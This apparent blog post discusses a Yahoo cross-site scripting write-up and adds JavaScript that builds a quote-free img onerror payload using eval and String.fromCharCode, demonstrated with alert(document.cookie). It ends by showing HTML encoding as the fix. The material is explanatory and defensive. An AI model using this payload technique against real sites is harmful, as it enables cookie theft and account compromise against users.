Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross-site scripting vulnerabilities, the attack we all know and love. It is actually a pretty interesting philosophical take on the issue. It does get technical near the end, including a Perl script that generates the attack on the fly.
In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler on an image tag, and since the injection point cannot contain quote characters, it builds its string literals with String.fromCharCode to get around that. Well done. Not really news, except the writeup is pretty interesting because it goes into a lot more detail about how the attack works than I typically do.
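To make the quote-evasion trick concrete, here is an added JavaScript example (my own, not code from the article or from Rarely Greys' Perl script, and the injected `alert(document.cookie)` body is an assumed stand-in for whatever the real payload was). It shows how any JavaScript source can be rewritten as a `String.fromCharCode(...)` call that contains no `'` or `"`, how that fits into an unquoted `onerror` attribute, and why HTML-encoding the untrusted data kills the payload regardless of how the quotes were dodged.

```javascript
// Added example: quote-free XSS payload construction and the encoding
// that defeats it. Not taken from the original article.

// Encode arbitrary JavaScript source as a String.fromCharCode(...) call.
// The output is digits, commas and parentheses only, so it contains no
// ' or " and survives a filter that strips or rejects quote characters.
function toFromCharCode(source) {
  const codes = Array.from(source, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Wrap the encoded source in an <img> whose onerror handler fires as soon
// as the bogus src fails to load. Nothing in the tag is quoted, and the
// handler expression has no whitespace, which matters because whitespace
// would terminate an unquoted attribute value.
function buildImgPayload(source) {
  const handler = `eval(${toFromCharCode(source)})`;
  return `<img src=x onerror=${handler}>`;
}

// What a naive quote-stripping filter checks for.
function containsQuotes(text) {
  return /['"]/.test(text);
}

// Reverse the encoding without eval, to show the transformation is
// lossless (the browser performs the same reconstruction at runtime).
function decodeFromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr);
  if (!m) throw new Error('not a fromCharCode expression');
  return String.fromCharCode(...m[1].split(',').map(Number));
}

// The actual fix: HTML-encode untrusted data before it lands in the page.
// Once < and > are entities the <img> is never parsed as markup, so
// onerror never runs, quotes or no quotes.
function htmlEncode(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed payload body for demonstration; has no spaces or quotes itself,
// but the same path works for source that does contain them.
const payload = buildImgPayload('alert(document.cookie)');
console.log(payload);
console.log('filter sees quotes:', containsQuotes(payload));
console.log('encoded for output:', htmlEncode(payload));
```

Note that `eval(String.fromCharCode(...))` is the general form: it lets the attacker smuggle source that itself contains quotes, spaces, or anything else the injection context forbids, because only the outer expression has to survive the filter. That is why blocklisting quote characters is not a fix and output encoding is.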